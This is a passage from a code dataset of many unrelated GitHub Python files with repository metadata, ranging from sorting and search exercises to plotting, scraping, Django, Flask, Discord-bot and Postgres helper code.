header=True)\n","repo_name":"32af3611/acrl","sub_path":"apps/mol/run_mol_opt.py","file_name":"run_mol_opt.py","file_ext":"py","file_size_in_byte":3956,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"36469503722","text":"# Counting Sort\n\na = [9, 8, 7, 6, 5, 4, 3, 2, 1]\nprint(a)\n\ncount = [0] * (max(a)+1)\nfor k in a:\n count[k] += 1\n \nfor i in range(len(count)-1):\n count[i+1] += count[i]\n \nb = [0] * len(a)\nfor k in reversed(a):\n count[k] -= 1\n b[count[k]] = k\nprint(b)","repo_name":"WenjieZ/sorting","sub_path":"counting_sort.py","file_name":"counting_sort.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30280047758","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom math import log,ceil,floor\nfrom matplotlib import pyplot as plt\nimport matplotlib.font_manager as mfm\nfrom matplotlib.font_manager import FontProperties\n\nimport sys\nsys.path.append(r\"results_py\")\nfrom sketch_fringe import data as results_fringe\nfrom sketch_hier import data as 
results_hier\n\ndef crlite(p,f=log(2.)):\n # TODO: integrality\n if p<=0: return 0\n return p * (log(1/p,2.)/f + 4.2*log(2.)/f)\n\ndef ent(p):\n if p<=0 or p>=1: return 0\n return (p*log(p) + (1-p)*log(1-p)) / log(0.5)\n\ndef lp_inspired_opt(prs,verbose=False):\n EPSILON = 0.01\n prs = list(sorted(prs))\n \n def pot(x): return 2**floor(log(x*1.,2.))\n def pod(x): return 2**(ceil(log(x*1.,2.)-EPSILON)-1)\n def bits_to_express(p):\n c = floor(log(p,0.5))\n p *= 2**c\n return c + (2-2*p)\n \n qs = [pot(pr) for pr in prs]\n qs[-1] = 1-sum(qs[:-1])\n def deriv(i): return prs[i]/pot(qs[i]) - prs[-1]/pod(qs[-1])\n for _ in range(100): # to prevent it from going off the rails\n dm,i = max((deriv(i),i) for i in range(len(qs)-1))\n #print(qs,dm,i)\n if dm <= 0: break\n amt = min(2*pot(qs[i])-qs[i], qs[-1]-pod(qs[-1]))\n qs[i] += amt\n assert(qs[i] <= 1)\n qs[-1] -= amt\n \n return sum(p*bits_to_express(q) for p,q in zip(prs,qs))\ndef new_est(p): return lp_inspired_opt([p,1-p])\n\nxcoords = [x/100000. for x in range(1,50001)]\n\nprop = mfm.FontProperties(family=\"Arial\", size=12, weight=\"normal\")\n\nfig,ax = plt.subplots(figsize=(6,4.5))\nax.set_xlim(1e-5,0.5)\nax.set_xlabel(\"fraction revoked\")\nax.set_ylabel(u\"bits per revocation\")\nax.set_xscale(\"log\")\n#ax.set_yscale(\"log\")\nax.plot(xcoords, [crlite(x)/x for x in xcoords], label=\"CRLite (est.)\")\n#ax.plot(xcoords, [crlite(x,1) for x in xcoords], label=\"CRLite/matrix (est.)\")\nax.plot([min(p,1-p) for (p,t,b,q) in results_fringe], [b*8/1.e7/p for (p,t,b,q) in results_fringe], label=\"Ours (measured, 10M certs)\")\nax.plot(xcoords, [new_est(x)/x for x in xcoords], label=\"Ours (asymptotic)\")\nax.plot(xcoords, [ent(x)/x for x in xcoords], label=\"Entropy limit\")\nax.legend(loc=\"upper right\", prop=prop)\nfig.savefig(\"entropy.png\", dpi=600)\n\n\nfig,ax = plt.subplots(figsize=(6,4.5))\nax.set_xlim(1e-4,0.5)\nax.set_xlabel(\"fraction revoked\")\nax.set_ylabel(u\"size / entropy\")\nax.set_xscale(\"log\")\n# ax.set_ylim(0,3)\n#ax.set_yscale(\"log\")\n#ax.plot(xcoords, [crlite(x)/ent(x) for x in xcoords], label=\"CRLite (est.)\")\nax.plot([min(p,1-p) for (p,t,b,q) in results_fringe], [b*8/1.e7/ent(p) for (p,t,b,q) in results_fringe], label=\"Ours (measured, 10M certs)\")\nax.plot(xcoords, [new_est(x)/ent(x) for x in xcoords], label=\"Ours (asymptotic)\")\n# ax.plot(xcoords, [1 for x in xcoords], label=\"Shannon\")\nax.legend(loc=\"upper left\", prop=prop)\nfig.savefig(\"ratio.png\", dpi=600)\n\nprint(\"Max ratio:\", max(b*8/1.e7/ent(p) for (p,t,b,q) in results_fringe))\nprint(\"Max ratio above 1e-4:\", max(b*8/1.e7/ent(p) for (p,t,b,q) in results_fringe if p > 1e-4))\n\nfig,ax = plt.subplots(figsize=(6,4.5))\nax.set_xlim(1e-4,0.5)\nax.set_xlabel(\"fraction revoked\")\nax.set_ylabel(u\"bits per revocation\")\nax.set_xscale(\"log\")\n#ax.set_yscale(\"log\")\nax.plot(xcoords, [crlite(x)/x for x in xcoords], label=\"CRLite (est.)\")\n#ax.plot(xcoords, [crlite(x,1) for x in xcoords], label=\"CRLite/matrix (est.)\")\nax.plot([min(p,1-p) for (p,t,b,q) in results_fringe], [b*8/1.e7/p for (p,t,b,q) in results_fringe], label=\"Ours (measured, 10M certs)\")\nax.plot(xcoords, [new_est(x)/x for x in xcoords], label=\"Ours (asymptotic)\")\nax.plot(xcoords, [ent(x)/x for x in xcoords], label=\"Entropy limit\")\nax.legend(loc=\"upper right\", prop=prop)\nfig.savefig(\"entropy.png\", dpi=600)\n\nfig,ax = plt.subplots(figsize=(6,4.5))\n# ax.set_xlim(10e-5,0.5)\nax.set_xlabel(\"fraction revoked\")\nax.set_ylabel(u\"µs / key\")\n# 
ax.set_xscale(\"log\")\nax.plot([min(p,1-p) for (p,t,b,q) in results_hier], [t/10 for (p,t,b,q) in results_hier], label=\"create hier\")\nax.plot([min(p,1-p) for (p,t,b,q) in results_fringe], [t/10 for (p,t,b,q) in results_fringe], label=\"create fringe\")\nax.plot([min(p,1-p) for (p,t,b,q) in results_hier], [q/10 for (p,t,b,q) in results_hier], label=\"query hier\")\nax.plot([min(p,1-p) for (p,t,b,q) in results_fringe], [q/10 for (p,t,b,q) in results_fringe], label=\"query fringe\")\nax.legend(loc=\"upper left\", prop=prop)\nfig.savefig(\"sketch-speed.png\", dpi=600)\n","repo_name":"bitwiseshiftleft/compressed_map","sub_path":"attic_c/mkfigure/gensketchplots.py","file_name":"gensketchplots.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"19174926135","text":"import pypulseq as pp\n\n# Inside 3T scanner (UHP):\nsystem = pp.Opts(max_grad=100, grad_unit='mT/m',\n max_slew=200, slew_unit='T/m/s',\n grad_raster_time=4e-6)\n\n# Outside 3T scanner (MR750):\nsystem = pp.Opts(max_grad=50, grad_unit='mT/m',\n max_slew=200, slew_unit='T/m/s',\n grad_raster_time=4e-6)\n\n# Gradient raster time = 4 us","repo_name":"rextlfung/PyPulseq-experiment","sub_path":"lab_scanner_specs.py","file_name":"lab_scanner_specs.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38447137929","text":"from mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\n\nmap = Basemap(llcrnrlon=-0.5,llcrnrlat=39.8,urcrnrlon=4.,urcrnrlat=43.,\n resolution='i', projection='tmerc', lat_0 = 39.5, lon_0 = 1)\n\nmap.drawmapboundary(fill_color='aqua')\nmap.fillcontinents(color='#ddaa66',lake_color='aqua')\nmap.drawcoastlines()\n\nmap.readshapefile('../sample_files/comarques', 'comarques')\n\nplt.show()","repo_name":"rveciana/BasemapTutorial","sub_path":"code_examples/shapefile/readshapefile_polygon.py","file_name":"readshapefile_polygon.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"37"} +{"seq_id":"9434721277","text":"from discord.ext import commands\nimport discord\nimport logging\nimport config\nfrom cogs import secret\n\ndef setup_logger():\n logging.basicConfig(filename='bot.log', level=logging.INFO)\n\n\n\nclass Bot(commands.Bot):\n def __init__(self, **kwargs):\n super().__init__(command_prefix=commands.when_mentioned_or('!'), **kwargs)\n for cog in config.cogs:\n try:\n self.load_extension(cog)\n except Exception as exc:\n logging.error('Could not load extension {0} due to {1.__class__.__name__}: {1}'.format(cog, exc))\n\n async def on_ready(self):\n logging.info('Logged on as {0} (ID: {0.id})'.format(self.user))\n print('Logged on as {0} (ID: {0.id})'.format(self.user))\n\n\nif __name__ == \"__main__\":\n setup_logger()\n bot = Bot()\n bot.run(secret.token)\n","repo_name":"coyote963/coybot2","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33495111637","text":"import numpy as np\nimport pandas as pd\nimport pandas_datareader.data as pdr\nimport fix_yahoo_finance as yf\nimport arch\nimport matplotlib.pyplot as plt\nfrom statsmodels.graphics.tsaplots import plot_acf\nyf.pdr_override()\n\n\nclass stock_vol:\n\n\tdef __init__(self, tk, start, end):\n\t\tself.tk = 
tk\n\t\tself.start = start\n\t\tself.end = end\n\t\tall_data = pdr.get_data_yahoo(self.tk, start=self.start, end=self.end)\n\t\tself.stock_data = pd.DataFrame(all_data['Adj Close'], columns=[\"Adj Close\"])\n\t\tself.stock_data[\"log\"] = np.log(self.stock_data)-np.log(self.stock_data.shift(1))\n\n\tdef mean_sigma(self):\n\t\tst = self.stock_data[\"log\"].dropna().ewm(span=252).std()\n\t\tsigma = st.iloc[-1]\n\t\treturn sigma\n\n\tdef garch_sigma(self):\n\t\tmodel = arch.arch_model(self.stock_data[\"log\"].dropna(), mean='Zero', vol='GARCH', p=1, q=1)\n\t\tmodel_fit = model.fit()\n\t\tforecast = model_fit.forecast(horizon=1)\n\t\tvar = forecast.variance.iloc[-1]\n\t\tsigma = float(np.sqrt(var))\n\t\treturn sigma\n\n\nif __name__ == \"__main__\":\n\tvol = stock_vol(\"AAPL\", start=\"2016-01-01\", end=\"2016-03-01\")\n\ttest = vol.stock_data[\"log\"].dropna()\n\tprint(test)\n\tfig = plot_acf(test)\n\tplt.show()\n","repo_name":"VivekPa/BinomialOptModel","sub_path":"stock_volatility.py","file_name":"stock_volatility.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"37"} +{"seq_id":"11097856814","text":"from threading import Thread\n\n\ndef squares(s, e):\n for i in range(s, e):\n print(i * i)\n\n\nt = Thread(target=squares, args=(10, 15))\nt.start()\nprint('Main Ends Here!')\n","repo_name":"srikanthpragada/PYTHON_29_OCT_2020","sub_path":"demo/libdemo/thread_target_demo.py","file_name":"thread_target_demo.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"36183473429","text":"import sublime, sublime_plugin\nimport datetime\n\n'''\nConvert a unix timestamp to a readable datetime string according to FORMAT.\nIt does nothing if not a valid timestamp.\nExample:\n input: 1406216630\n output: \"Thu 24/07/2014 15:43:50 UTC\"\n'''\n\nFORMAT = '\"%a %d/%m/%Y %H:%M:%S UTC\"'\n\nclass UnixTsToDatetimeCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n for region in self.view.sel():\n if region.empty():\n continue\n text = self.view.substr(region)\n\n if not self._is_int(text):\n continue\n\n replacement = self._timestamp_to_userfriendly_datetime(text)\n if replacement:\n self.view.replace(edit, region, replacement)\n else:\n continue\n\n def _timestamp_to_userfriendly_datetime(self, timestamp):\n try:\n return datetime.datetime.utcfromtimestamp(int(timestamp)).strftime(FORMAT)\n except OSError as e:\n return False\n\n def _is_int(self, test):\n try:\n int(test)\n except ValueError as e:\n return False\n else:\n return True\n","repo_name":"nmalbran/sublime-conf","sub_path":"st3/unix_ts_to_datetime.py","file_name":"unix_ts_to_datetime.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2199923328","text":"from django.shortcuts import render, redirect\r\nfrom .models import Repo, Contributor, Commit, Language\r\nfrom .forms import RepoForm\r\nfrom django.http import JsonResponse, HttpResponse\r\nfrom django.core import serializers\r\n\r\ndef home(request):\r\n if request.method == 'POST':\r\n form = RepoForm(request.POST)\r\n if form.is_valid():\r\n repo = form.save()\r\n return redirect('info', pk=repo.pk)\r\n else:\r\n form = RepoForm()\r\n return render(request, 'github/home.html', { 'form' : form })\r\n\r\ndef info(request, pk):\r\n repo = Repo.objects.get(pk=pk)\r\n contributors = 
repo.contributor_set.first()\r\n commits = repo.commit_set.all()\r\n languages = repo.language_set.all()\r\n return render(request, 'github/info.html', {'repo':repo,'contributors':contributors,'commits':commits,'languages':languages})\r\n\r\ndef api(request, pk):\r\n repo = Repo.objects.get(pk=pk)\r\n contributors = serializers.serialize('json', [repo.contributor_set.first()])\r\n return JsonResponse({'repo':repo,'contributors':contributors})\r\n\r\ndef api_list(request, pk):\r\n repo = Repo.objects.get(pk=pk)\r\n commits = list(repo.commit_set.all().values())\r\n languages = list(repo.language_set.all().values())\r\n return JsonResponse({'commits' : commits, 'languages' : languages})\r\n\r\ndef searches(request):\r\n repos = Repo.objects.all()\r\n return render(request, 'github/searches.html', { 'repos' : repos })\r\n","repo_name":"ryanmg14/GitGud","sub_path":"backend/github/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"27278965331","text":"def printLCS(s1,s2) :\n n=len(s1)\n m=len(s2)\n\n dp = [[-1 for _ in range(m+1)] for _ in range(n+1) ]\n\n for i in range(n+1):\n dp[i][0] = 0\n for i in range(m+1):\n dp[0][i] = 0\n s_len = 0\n row = n\n col = m\n for i in range(1,n+1) :\n for j in range(1,m+1) :\n if s1[i-1] == s2[j-1]:\n dp[i][j] = 1+dp[i-1][j-1]\n else:\n dp[i][j] = 0\n # s_len = max(s_len, dp[i][j])\n if dp[i][j] > s_len:\n row = i\n col = j\n s_len= dp[i][j]\n\n lcs =''\n print('row = ',row)\n print('col = ',col)\n for i in range(n + 1):\n for j in range(m + 1):\n print(dp[i][j], ' ', end='')\n print()\n while row > 0 and col > 0:\n if s1[row-1] == s2[col-1]:\n lcs+=s2[col-1]\n row-=1\n col-=1\n else:\n if dp[row-1][col] > dp[row][col-1] :\n row-=1\n else:\n col-=1\n print('longest common substring = ',lcs[::-1])\n return s_len\n\n\nif __name__ == '__main__':\n text1 = \"abcdxyz\"\n text2 = \"xyzabcd\"\n\n lcs2 = printLCS(text1, text2)\n print('ANS (tabular) = ', lcs2)\n #\n #\n # #\n # open_chars = ['(', '[', '{']\n # closed_reversed = {\n # ')': '(',\n # ']': '[',\n # '}': '{'\n # }\n #\n # stack = []\n # for ch in line:\n # if ch in open_chars:\n # stack.append(ch)\n # elif len(stack) < 1 or stack.pop() != closed_reversed[ch]:\n # return False\n #\n # return len(stack) == 0\n","repo_name":"smzgit/DSA-python","sub_path":"17_Dynamic Programming/15_print_LC_substring.py","file_name":"15_print_LC_substring.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29163054782","text":"from flask import request, Response\nimport json\n\n\nclass Interface:\n def __init__(self, model, metrics):\n self.model = model\n self.metrics = metrics\n\n def predict(self):\n pass\n\n def train(self):\n payload = request.json\n y = payload[\"target\"]\n x = payload[\"features\"]\n\n y_pred = self.model.predict_one(x)\n\n for metric in self.metrics:\n metric.update(y, y_pred)\n\n self.model.learn_one(x, y)\n\n return Response({}, status=201, content_type=\"application/json\")\n\n def metric(self):\n response = {}\n\n for metric in self.metrics:\n response.update({f\"{metric.__class__.__name__}\": metric.get()})\n\n return Response(\n json.dumps(response), status=201, content_type=\"application/json\"\n )\n\n def registerToApp(\n self,\n app,\n prediction_route_url=\"predict\",\n training_route_url=\"train\",\n metric_route_url=\"metric\",\n ):\n app.add_url_rule(\n 
f\"/{prediction_route_url}\", \"predict\", self.predict, methods=[\"POST\"]\n )\n app.add_url_rule(\n f\"/{training_route_url}\", \"train\", self.train, methods=[\"POST\"]\n )\n app.add_url_rule(f\"/{metric_route_url}\", \"metric\", self.metric, methods=[\"GET\"])\n","repo_name":"sebiwtt/flaskriver","sub_path":"flaskriver/Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"26191395643","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom mind.items import MindItem\n\n\nclass DoubanSpiderSpider(scrapy.Spider):\n name = 'douban_spider'\n allowed_domains = ['douban.com']\n start_urls = ['https://movie.douban.com/top250']\n\n def parse(self, response):\n x = response.xpath(\"//ol[@class='grid_view']/li\")\n for item in x:\n douban_item = MindItem()\n douban_item['movie_rank'] = item.xpath(\".//em/text()\").extract_first()\n douban_item['movie_name'] = item.xpath(\".//span[@class='title']/text()\").extract_first()\n douban_item['movie_score'] = item.xpath(\".//span[@class='rating_num']/text()\").extract_first()\n douban_item['movie_describe'] = item.xpath(\".//span[@class='inq']/text()\").extract_first()\n douban_item['movie_pic'] = item.xpath(\".//div[@class='pic']//img/@src\").extract_first()\n #douban_item['movie_star'] = item.xpath(\".//div[@class='star']/span[0]/@class\").extract()\n #传递数据\n yield douban_item\n print(douban_item)\n\n\n next_link = response.xpath(\"//div[@class='paginator']//span[@class='next']//a/@href\").extract()\n if next_link:\n next_url = self.start_urls[0] + next_link[0]\n yield scrapy.Request(next_url, callback=self.parse)\n\n\n","repo_name":"whyinlijun/mind","sub_path":"mind/spiders/douban_spider.py","file_name":"douban_spider.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7083561675","text":"from django.contrib import admin\nfrom users.models import Profile\n# Register your models here.\n\n@admin.register(Profile)\nclass ProfileAdmin(admin.ModelAdmin):\n \"\"\"Profile admin.\"\"\"\n list_display = ('user', 'phone_number', 'website', 'picture')\n list_display_links = ('user', 'website')\n list_editable = ('phone_number', 'picture')\n search_fields = ('user__email', 'user__first_name', 'user_last_name')\n list_filter = ('created', 'modified')","repo_name":"diegocastroplazas/django_tuto2","sub_path":"platzigram/users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17455023526","text":"# 1). 
Stwórz funkcję nazwaną dodajListy() która zwróci nową listę sumując ze sobą elementy na tych samych indeksach.\n# Możesz przypuścić, że jako parametry do funkcji podawane są zawsze listy zawierające tylko liczby.\n# Jeżeli listy są różnej długości, funkcja powinna wyświetlić napis ‘Podane listy muszą być tej samej długości’\n\ndef dodajListy(A, B):\n\tC = []\n\tif len(A) == len(B):\n\t\tfor x, y in zip(A, B):\n\t\t\tC.append(x + y)\n\t\treturn C\n\tif len(A) != len(B):\n\t\t\treturn \"Podane listy muszą być tej samej długości\"\n\n\nif __name__ == \"__main__\":\n\t\tlista_1 = []\n\t\tlista_2 = []\n\t\tdl_listy_1 = int(input('Podaj liczbę elementów pierwszej listy: '))\n\t\tfor item in range(dl_listy_1):\n\t\t\tdigit = int(input('Podaj liczbę którą chcesz dodać do listy: '))\n\t\t\tlista_1.append(digit)\n\t\tdl_listy_2 = int(input('Podaj liczbę elementów drugiej listy: '))\n\t\tfor item in range(dl_listy_2):\n\t\t\tdigit = int(input('Podaj liczbę którą chcesz dodać do listy: '))\n\t\t\tlista_2.append(digit)\n\t\tprint('Łączna wartość liczb z listy_1 i listy_2 wynosi: ', dodajListy(lista_1, lista_2))\n\n","repo_name":"Mardmoo/ISA-Bootcamp_zadania-domowe","sub_path":"Zjazd_2/praca_domowa_zjazd2_1.py","file_name":"praca_domowa_zjazd2_1.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75223341547","text":"import random\n\n\n# Ask the player to choose its option\ndef play():\n player = input(\"What's your choice? 'R' for Rock, 'P' for Paper, 'S' for Scissor\\n\").lower()\n computer = random.choice(['r', 'p', 's'])\n\n if player == computer:\n return f'''\n You: {choice_name(player)}\\n\n Computer: {choice_name(computer)}\\n\n It's a tie!\n '''\n elif is_win(player, computer):\n return f'''\n You: {choice_name(player)}\\n\n Computer: {choice_name(computer)}\\n\n You won!\n '''\n else:\n return f'''\n You: {choice_name(player)}\\n\n Computer: {choice_name(computer)}\\n\n You lose!\n '''\n\n\n# r > s, s > p, p > r\ndef is_win(player, computer):\n if (player == 'r' and computer == 's') or (player == 's' and computer == 'p') or \\\n (player == 'p' and computer == 'r'):\n return True\n\n\ndef choice_name(choice):\n if choice == 'r':\n return \"Rock\"\n elif choice == 'p':\n return \"Paper\"\n else:\n return \"Scissor\"\n\n\nmatch = play()\nprint(match)\n","repo_name":"felipefcampelo/python-rock-paper-scissor","sub_path":"rock_paper_scissor.py","file_name":"rock_paper_scissor.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"432329553","text":"import psycopg2\n\nclass Database():\n\n def __init__(self):\n #Params for connect Postgres database\n self.USER_DB=\"soar\"\n self.PASSW_DB= \"soar\"\n self.HOST_DB=\"localhost\"\n self.NAME_DB=\"prueba\"\n self.connection = psycopg2.connect(\n host=self.HOST_DB,\n database=self.NAME_DB,\n user=self.USER_DB,\n password=self.PASSW_DB)\n\n\n def make_query(self, query):\n cur = self.connection.cursor()\n cur.execute(query)\n id = cur.fetchall()\n\n #print(\"id= \",id,\" typeId= \",type(id))\n #print(id[0], \" type --> \", type(id[0]))\n #print(\"final result--> \",id[0][0])\n\n cur = self.connection.cursor()\n self.connection.commit()\n cur.close()\n return id[0][0] #return the id of the last insert\n\n\n def make_insert_database(self, inserts : list):\n '''\n param: inserts [] Array of differents inserts.\n\n Connect to database and execute the 
differents inserts of param 'inserts'\n '''\n cur = self.connection.cursor()\n for insert in inserts:\n #print(\"insert --> \", insert)\n cur.execute(insert)\n\n cur = self.connection.cursor()\n self.connection.commit()\n cur.close()\n \n\n def transformIndex(self, line):\n return line.replace(\"index\",\"index_\")\n\n\n def transform(self, line):\n return line.replace(\"{}.\", \"_\")\n\n\n def get_all_inserts_from_json(self, jsonToDatabase, add_insert, table_name, parser, isAlert=True):\n '''\n Translate a JSON to a SQL insert\n '''\n #print(\"\\n\\nJSON DATABASE\",jsonToDatabase)\n insert=\"INSERT INTO \"+ table_name +\" (\" + ','.join(parser)+\") VALUES (\"\n auxDicc=parser.copy()\n if isAlert==True:\n last_key = list(auxDicc)[-1]\n # remove the last key using .pop() method\n removed_tuple = auxDicc.pop(last_key)\n insert = self.transformIndex(insert)\n else:\n insert = self.transform(insert)\n first_value_insert=True\n for key in auxDicc.keys():\n try:\n if first_value_insert:\n insert+=\"'\"+str(jsonToDatabase[key])+\"'\"\n first_value_insert=False\n else:\n if type(jsonToDatabase[key]) == list:\n insert+=\", ARRAY \"+str(jsonToDatabase[key])\n elif jsonToDatabase[key][0] == '<': # xml format\n insert += \", '\" +str(jsonToDatabase[key]).replace(\"'\",\"\")+\"'\"\n else:\n insert+=\", '\"+str(jsonToDatabase[key])+\"'\"\n except:\n insert+= \",' '\" #This var is not found on javascript\n if isAlert==True:\n insert+=\",1)\"\n else:\n insert+=\")\"\n #print(insert)\n add_insert.append(insert)\n\n\n def join_all_inserts(self, all_inserts : list, on_conflict_insert=\"\"):\n '''\n Join differents insert for the same table.\n Return a string with all this inserts.\n\n For example if we have\n Insert into (...) values (...); :a1\n Insert into
<table> (...) values (...); :a1\n Insert into <table> (...) values (...); :a2\n ...\n Insert into
<table> (...) values (...); :an\n\n To do these inserts more efficiently, it is better to do\n Insert into <table> (...) values a1, ..., an;\n '''\n if len(all_inserts)==0:\n return -1\n\n if len(all_inserts)==1:\n return all_inserts[0] + \" \"+ on_conflict_insert\n \n final_insert=\"\"\n first_value=True\n for i in all_inserts:\n #aux=i.upper().split(\"VALUES (\")\n aux=i.split(\"VALUES (\")\n if first_value:\n final_insert+=aux[0]+\" VALUES (\" #This is INSERT INTO <table>
    values\n final_insert+=aux[1]\n first_value=False\n else:\n final_insert+=\", \" #For separate diferents inserts\n final_insert+=\"(\"+aux[1]\n #if final_insert == \"\":\n # return -1\n #else:\n final_insert += \" \"+ on_conflict_insert\n return final_insert\n\n\n## Testing ## \n#join_all_inserts#\n'''\ndatabase = Database()\n\nlist_querys = [\"INSERT INTO persona(nombre, edad, DNI) VALUES ('macia','10','asdf')\", \"INSERT INTO persona(nombre, edad, DNI) VALUES ('juan','39','fghf')\"]\nres=database.join_all_inserts(list_querys)\nprint(res,'\\n')\n\nlist_querys = []\nres=database.join_all_inserts(list_querys)\nprint(res,'\\n')\n\nlist_querys = [\"INSERT INTO persona(nombre, edad, DNI) VALUES ('macia','10','asdf')\"]\nres=database.join_all_inserts(list_querys, \"ON CONFLICT (dni) \")\nprint(res,'\\n')\n'''\n\n##make_insert_database(self, insert)\n# make_insert_database(insert)\n'''\ndatabase = Database()\n\ninsert = [\"INSERT INTO usr(name) VALUES ('test1'), ('test2')\", \"INSERT INTO usr(name) VALUES ('test4'), ('test3')\"]\nres=database.make_insert_database(insert)\n'''\n\n# make_query(self, query)\n'''\ndatabase = Database()\nquery = 'select * from usr'\nres = database.make_query(query)\nprint(res)\n'''\n","repo_name":"MaciaKing/Soar","sub_path":"Back-End/Server/Database/Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":5104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34240093533","text":"import unicodedata\n\nfrase = input('Ingrese una frase para saber si es palíndromo: \\n')\n\ndef reconocer_palindromo(frase):\n frase = ''.join(c for c in frase if c.isalnum())\n frase = ''.join((c for c in unicodedata.normalize('NFD', frase) if unicodedata.category(c) != 'Mn'))\n frase = frase.lower()\n\n if frase == frase[::-1]:\n print('La frase es palíndromo')\n else:\n print('La frase no es palíndromo')\n\nreconocer_palindromo(frase)\n","repo_name":"Enriquepardo/Ejercicios-de-recursividad","sub_path":"ejercicio 6/reconocer_palindromos.py","file_name":"reconocer_palindromos.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36340593547","text":"# takes input and converts to integer using list comprehension\na = [int(x) for x in input().split()] \n\nprint(max(a))\n\ntxt = input()\n\nrev_string = txt[::-1]\n\nif txt == rev_string :\n print(\"Palindrome\")\nelse :\n print(\"Not a Palindrome\")\n\ntext = input()\n\nvowels = ['a','e','i','o','u','A','E','I','O','U']\n\ntext_no_vowels = \"\"\n\nfor character in text :\n if character not in vowels :\n text_no_vowels = text_no_vowels + character\n\nprint(text_no_vowels)\n\nimport csv\n\nwith open(\"csv_files.txt\", mode='r') as file :\n\n csv_file = csv.reader(file)\n\n for line in csv_file :\n print(line)\n\ncp_subjects = {\"painting\":124, \"advertisement\":123, \"dance\":126, \"music\":125}\nprint(cp_subjects['advertisement'])\n\nsorted_dict = dict(sorted(cp_subjects.items(), key=lambda x:x[1]))\nprint(sorted_dict)","repo_name":"tmsunnyduck/python-learning","sub_path":"excersises/google_form_max.py","file_name":"google_form_max.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27278895391","text":"def binary_search(arr, key, low, high):\n while high > low:\n mid = (low + high) // 2\n print('arr mid = ', arr[mid])\n if arr[mid] == key:\n return f'{key} 
exists in the array at index {mid}'\n elif key < arr[mid]:\n high = mid\n else:\n low = mid + 1\n return f'{key} doesnt exists in the array'\n\n\nif __name__ == '__main__':\n arr = [12, 41, 55, 1, 2, 90, 51, 88]\n arr.sort()\n print(arr)\n low, high = 0, len(arr)\n key = 88\n print(binary_search(arr, key, low, high))\n","repo_name":"smzgit/DSA-python","sub_path":"13_Searching/2_Binary_Search.py","file_name":"2_Binary_Search.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39949653661","text":"import pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\n\n# Changes UI language through CLI\ndef pytest_addoption(parser):\n parser.addoption('--language', action='store', default='--lang=en',\n help='Choose language - default is English (UK)')\n\n\n@pytest.fixture(scope=\"function\")\ndef browser(request):\n # Changes UI language using Options instance\n options_set = Options()\n user_language = request.config.getoption(\"language\")\n options_set.add_experimental_option('prefs', {'intl.accept_languages': user_language})\n\n # Launches browser with a set of options\n print(\"\\nStarting Chrome browser for testing...\")\n browser = webdriver.Chrome(options=options_set)\n yield browser\n\n # Closes browser\n print(\"\\nQuitting browser...\")\n browser.quit()\n","repo_name":"Elieeeya/Selenium_Python_project","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28364192028","text":"from django.contrib import auth, messages\r\nfrom django.shortcuts import render, HttpResponseRedirect\r\nfrom .models import User\r\nfrom .forms import UserLoginForm, UserRegForm, UserProfileForm\r\n\r\n\r\ndef login(request):\r\n if request.method == 'POST':\r\n form = UserLoginForm(data=request.POST)\r\n if form.is_valid():\r\n username = request.POST['username']\r\n password = request.POST['password']\r\n user = auth.authenticate(username=username, password=password)\r\n if user:\r\n auth.login(request, user)\r\n return HttpResponseRedirect('/')\r\n else:\r\n form = 